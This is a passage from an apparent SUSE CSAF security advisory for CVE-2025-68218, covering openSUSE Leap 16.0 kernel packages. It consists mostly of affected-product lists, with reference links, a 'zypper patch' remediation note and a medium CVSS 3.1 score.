"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68218",
"url": "https://www.suse.com/security/cve/CVE-2025-68218"
},
{
"category": "external",
"summary": "SUSE Bug 1255245 for CVE-2025-68218",
"url": "https://bugzilla.suse.com/1255245"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
